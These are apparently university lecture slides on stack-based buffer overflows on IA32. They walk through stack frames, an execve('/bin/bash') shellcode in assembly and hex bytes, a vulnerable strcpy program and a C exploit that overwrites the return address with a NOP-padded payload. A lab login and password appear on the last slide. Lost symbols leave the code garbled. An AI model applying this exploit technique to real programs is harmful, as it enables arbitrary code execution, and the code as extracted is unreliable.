Stack-based buffer overflows

1
Stack-based buffer overflows

• Yves Younan
• DistriNet, Department of Computer Science
• Katholieke Universiteit Leuven
• Belgium
• Yves.Younan_at_cs.kuleuven.ac.be

2
Overview

• Introduction
• Buffer overflows
• Stack-based buffer overflows
• Shellcode
• Code injection
• Conclusion

3
Introduction

• Buffer overflows write outside the boundaries of
  an array
• Can be used to overwrite adjacent memory
• The stack contains control-flow related data,
  e.g. return addresses
• Overwriting this data allows an attacker to
  execute new or existing code

4
Overview

• Introduction
• Buffer overflows
• Stack-based buffer overflows
• Shellcode
• Code injection
• Conclusion

5
Buffer overflows (on IA32)

• int main(int argc, char argv)
• int a
• char buf100
• strcpy(buf, argv)
• Int a is allocated on the stack 4 bytes
• Buf has memory allocated for 100 chars 100 bytes
• Argv could be larger than that, allowing an
  attacker to overwrite a in this example

6
Buffer overflow on IA32
High addr
int a
char buf100
Low addr
7
Overview

• Introduction
• Buffer overflows
• Stack-based buffer overflows
• Shellcode
• Code injection
• Conclusion

8
Stack based buffer overflows

• void f1(char a)
• char buffer100
• strcpy(buffer, a)
• void f0(char b)
• f1(b)

9
Stack-based buffer overflows
Stack
High addr
f0
Return address f0

Saved Frame Ptr f0
Stack frame f0
call f1
Local variables f0

Arguments f1
f1
buffer
Return address f1
overflow()

Stack frame f1
Saved Frame Ptr f1
Buffer
Injected code
10
Overview

• Introduction
• Buffer overflows
• Stack-based buffer overflows
• Shellcode
• Code injection
• Conclusion

11
Shellcode

• Code to execute once the return address has been
  overwritten
• Usually inserted into buffer that is used to
  overflow
• Some subtleties a NULL will terminate an strcpy,
  \n will terminate gets

12
Example code

• include ltunistd.hgt
• int main()
• char argv2
• argv0 "/bin/bash"
• argv1 0
• execve(argv0, argv, 0)

13
Example transformed to assembly

• .type main,_at_function
• main
• push 0x68 Place h on
  the stack.
• push 0x7361622f Place sab/
  on the stack.
• push 0x6e69622f Place nib/
  on the stack.
• mov esp,ebx Copy the
  pointer to /bin/bash to ebx.
• xor edx,edx Empty edx.
• push edx Place a NULL
  on the stack to terminate the argv.
• push ebx Place the
  pointer to /bin/bash on the stack.
• mov esp,ecx Copy the
  pointer to the pointer to /bin/bash into ecx.
• mov 0xb,eax Let the
  syscall know we want execve
• int 0x80 Do the
  system call

14
Shellcode

• (gdb) x/27b main
• 0x8048308 ltmaingt 0x6a 0x68 0x68 0x2f 0x62 0x61
  0x73 0x68
• 0x8048310 ltmain8gt 0x2f 0x62 0x69 0x6e 0x89 0xe3
  0x31 0xd2
• 0x8048318 ltmain16gt 0x52 0x53 0x89 0xe1 0xb8
  0x0b 0x00 0x00
• 0x8048320 ltmain24gt 0x00 0xcd 0x80

15
Shellcode

• .globl main
• .type main,_at_function
• main
• push 0x68
• push 0x7361622f
• push 0x6e69622f
• mov esp,ebx
• xor edx,edx
• push edx
• push ebx
• mov esp,ecx
• xor eax,eax set eax to 0
• mov 0xb,al copy 0xb into
  al (least signicant byte of eax)
• int 0x80

16
Overview

• Introduction
• Buffer overflows
• Stack-based buffer overflows
• Shellcode
• Code injection
• Conclusion

17
Sample vulnerable program

• void function(int a, char b)
• char string110
• char string250
• strcpy(string2,b)
• int main(int argc, char argv)
• function(1,argv1)

18
Sample exploit

• include ltstdio.hgt
• include ltstdlib.hgt
• char shellcode "\x6a\x68\x68\x2f\x62\x61\
  x73\x68\x2f\x62\x69\x6e\x89" "\xe3\x31\xd2\x52\x53
  \x89\xe1\x31\xc0\xb0\x0b\xcd\x80"
• define ADDR 0xbffffe2c
• int main()
• char overflow72
• char argv3 "./bufferoverflow",
  overflow, NULL
• memset(overflow,'\x90',72) // fill
  with NOPs
• (long ) overflow68 ADDR // replace
  ret. addr.
• memcpy(overflow, shellcode,
  strlen(shellcode))
• execve(argv0,argv,0) // exex
  program

19
Conclusion

• Follow Geras Insecure Programming by example
• http//community.corest.com/gera/InsecureProgramm
  ing/
• Login/pass for the computers cstudy/distrinet